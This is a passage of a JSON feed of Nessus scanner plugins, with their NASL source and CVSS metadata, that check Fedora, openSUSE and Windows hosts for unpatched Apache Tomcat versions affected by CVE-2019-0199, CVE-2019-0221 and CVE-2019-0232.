(!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC30\", reference:\"tomcat-9.0.21-1.fc30\", epoch:\"1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"1:tomcat\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-24T14:56:00", "description": "This update includes a rebase from 9.0.13 up to 9.0.21 which resolves two CVEs along with various other bugs/features :\n\n - rhbz#1673856 tomcat-9.0.21 is available\n\n - rhbz#1713279 CVE-2019-0221 tomcat: XSS in SSI printenv\n\n - rhbz#1693326 CVE-2019-0199 tomcat: Apache Tomcat HTTP/2 DoS\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-07-05T00:00:00", "type": "nessus", "title": "Fedora 29 : 1:tomcat (2019-d66febb5df)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0199", "CVE-2019-0221"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:1:tomcat", "cpe:/o:fedoraproject:fedora:29"], "id": "FEDORA_2019-D66FEBB5DF.NASL", "href": "https://www.tenable.com/plugins/nessus/126483", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-d66febb5df.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(126483);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-0199\", \"CVE-2019-0221\");\n script_xref(name:\"FEDORA\", value:\"2019-d66febb5df\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Fedora 29 : 1:tomcat (2019-d66febb5df)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update includes a rebase from 9.0.13 up to 9.0.21 which resolves\ntwo CVEs along with various other bugs/features :\n\n - rhbz#1673856 tomcat-9.0.21 is available\n\n - rhbz#1713279 CVE-2019-0221 tomcat: XSS in SSI printenv\n\n - rhbz#1693326 CVE-2019-0199 tomcat: Apache Tomcat HTTP/2\n DoS\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-d66febb5df\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected 1:tomcat package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0221\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:1:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"tomcat-9.0.21-1.fc29\", epoch:\"1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"1:tomcat\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-24T14:56:21", "description": "This update for tomcat to version 9.0.21 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2019-0199: Fixed a denial of service in the HTTP/2 implementation related to streams with excessive numbers of SETTINGS frames (bsc#1131055).\n\n - CVE-2019-0221: Fixed a cross site scripting vulnerability with the SSI printenv command (bsc#1136085).\n\nNon-security issues fixed :\n\n - Increase maximum number of threads and open files for tomcat (bsc#1111966).\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update project.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-07-26T00:00:00", "type": "nessus", "title": "openSUSE Security Update : tomcat (openSUSE-2019-1808)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0199", "CVE-2019-0221"], "modified": "2022-12-06T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:tomcat", "p-cpe:/a:novell:opensuse:tomcat-admin-webapps", "p-cpe:/a:novell:opensuse:tomcat-docs-webapp", "p-cpe:/a:novell:opensuse:tomcat-el-3_0-api", "p-cpe:/a:novell:opensuse:tomcat-embed", "p-cpe:/a:novell:opensuse:tomcat-javadoc", "p-cpe:/a:novell:opensuse:tomcat-jsp-2_3-api", "p-cpe:/a:novell:opensuse:tomcat-jsvc", "p-cpe:/a:novell:opensuse:tomcat-lib", "p-cpe:/a:novell:opensuse:tomcat-servlet-4_0-api", "p-cpe:/a:novell:opensuse:tomcat-webapps", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2019-1808.NASL", "href": "https://www.tenable.com/plugins/nessus/127088", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-1808.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(127088);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/06\");\n\n script_cve_id(\"CVE-2019-0199\", \"CVE-2019-0221\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"openSUSE Security Update : tomcat (openSUSE-2019-1808)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for tomcat to version 9.0.21 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2019-0199: Fixed a denial of service in the HTTP/2\n implementation related to streams with excessive numbers\n of SETTINGS frames (bsc#1131055).\n\n - CVE-2019-0221: Fixed a cross site scripting\n vulnerability with the SSI printenv command\n (bsc#1136085).\n\nNon-security issues fixed :\n\n - Increase maximum number of threads and open files for\n tomcat (bsc#1111966).\n\nThis update was imported from the SUSE:SLE-15-SP1:Update update\nproject.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1111966\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1131055\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1136085\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected tomcat packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0221\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-el-3_0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-embed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-jsp-2_3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-servlet-4_0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"tomcat-9.0.21-lp151.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"tomcat-admin-webapps-9.0.21-lp151.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"tomcat-docs-webapp-9.0.21-lp151.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"tomcat-el-3_0-api-9.0.21-lp151.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"tomcat-embed-9.0.21-lp151.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"tomcat-javadoc-9.0.21-lp151.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"tomcat-jsp-2_3-api-9.0.21-lp151.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"tomcat-jsvc-9.0.21-lp151.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"tomcat-lib-9.0.21-lp151.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"tomcat-servlet-4_0-api-9.0.21-lp151.3.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"tomcat-webapps-9.0.21-lp151.3.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-24T14:53:41", "description": "This update for tomcat to version 9.0.20 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2019-0199: Fixed a denial of service in the HTTP/2 implementation related to streams with excessive numbers of SETTINGS frames (bsc#1131055).\n\n - CVE-2019-0221: Fixed a cross site scripting vulnerability with the SSI printenv command (bsc#1136085).\n\nNon-security issues fixed :\n\n - Increase maximum number of threads and open files for tomcat (bsc#1111966).\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-07-01T00:00:00", "type": "nessus", "title": "openSUSE Security Update : tomcat (openSUSE-2019-1673)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0199", "CVE-2019-0221"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:tomcat", "p-cpe:/a:novell:opensuse:tomcat-admin-webapps", "p-cpe:/a:novell:opensuse:tomcat-docs-webapp", "p-cpe:/a:novell:opensuse:tomcat-el-3_0-api", "p-cpe:/a:novell:opensuse:tomcat-embed", "p-cpe:/a:novell:opensuse:tomcat-javadoc", "p-cpe:/a:novell:opensuse:tomcat-jsp-2_3-api", "p-cpe:/a:novell:opensuse:tomcat-jsvc", "p-cpe:/a:novell:opensuse:tomcat-lib", "p-cpe:/a:novell:opensuse:tomcat-servlet-4_0-api", "p-cpe:/a:novell:opensuse:tomcat-webapps", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2019-1673.NASL", "href": "https://www.tenable.com/plugins/nessus/126373", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-1673.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(126373);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-0199\", \"CVE-2019-0221\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"openSUSE Security Update : tomcat (openSUSE-2019-1673)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for tomcat to version 9.0.20 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2019-0199: Fixed a denial of service in the HTTP/2\n implementation related to streams with excessive numbers\n of SETTINGS frames (bsc#1131055).\n\n - CVE-2019-0221: Fixed a cross site scripting\n vulnerability with the SSI printenv command\n (bsc#1136085).\n\nNon-security issues fixed :\n\n - Increase maximum number of threads and open files for\n tomcat (bsc#1111966).\n\nThis update was imported from the SUSE:SLE-15:Update update project.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1111966\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1131055\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1136085\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected tomcat packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-0221\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/04/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-docs-webapp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-el-3_0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-embed\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-javadoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-jsp-2_3-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-jsvc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-servlet-4_0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-9.0.20-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-admin-webapps-9.0.20-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-docs-webapp-9.0.20-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-el-3_0-api-9.0.20-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-embed-9.0.20-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-javadoc-9.0.20-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-jsp-2_3-api-9.0.20-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-jsvc-9.0.20-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-lib-9.0.20-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-servlet-4_0-api-9.0.20-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"tomcat-webapps-9.0.20-lp150.2.19.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat / tomcat-admin-webapps / tomcat-docs-webapp / etc\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:53:15", "description": "The version of Tomcat installed on the remote Windows host is prior to 9.0.19. It is, therefore, affected by a remote code execution vulnerability due to a bug in the way the JRE passes command line arguments to Windows. An unauthenticated, remote attacker can exploit this to execute arbitrary commands. Additionally, it is affected by a cross-site (XSS) scripting vulnerability as the SSI printenv command echoes user provided data without proper escaping.\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-04-15T00:00:00", "type": "nessus", "title": "Apache Tomcat 9.0.0.M1 < 9.0.19 Remote Code Execution Vulnerability (Windows)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0221", "CVE-2019-0232"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:apache:tomcat"], "id": "TOMCAT_9_0_18.NASL", "href": "https://www.tenable.com/plugins/nessus/124058", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124058);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2019-0221\", \"CVE-2019-0232\");\n script_bugtraq_id(107906);\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Apache Tomcat 9.0.0.M1 < 9.0.19 Remote Code Execution Vulnerability (Windows)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows Apache Tomcat server is affected by a remote code execution vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Tomcat installed on the remote Windows host is prior to 9.0.19. It is, therefore, affected by a remote\ncode execution vulnerability due to a bug in the way the JRE passes command line arguments to Windows. An \nunauthenticated, remote attacker can exploit this to execute arbitrary commands. \nAdditionally, it is affected by a cross-site (XSS) scripting vulnerability as the SSI printenv command echoes user\nprovided data without proper escaping.\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/apache/tomcat/commit/4b244d8\");\n # https://tomcat.apache.org/security-9.html#Fixed_in_Apache_Tomcat_9.0.19\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?387f17bf\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache Tomcat version 9.0.19 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n 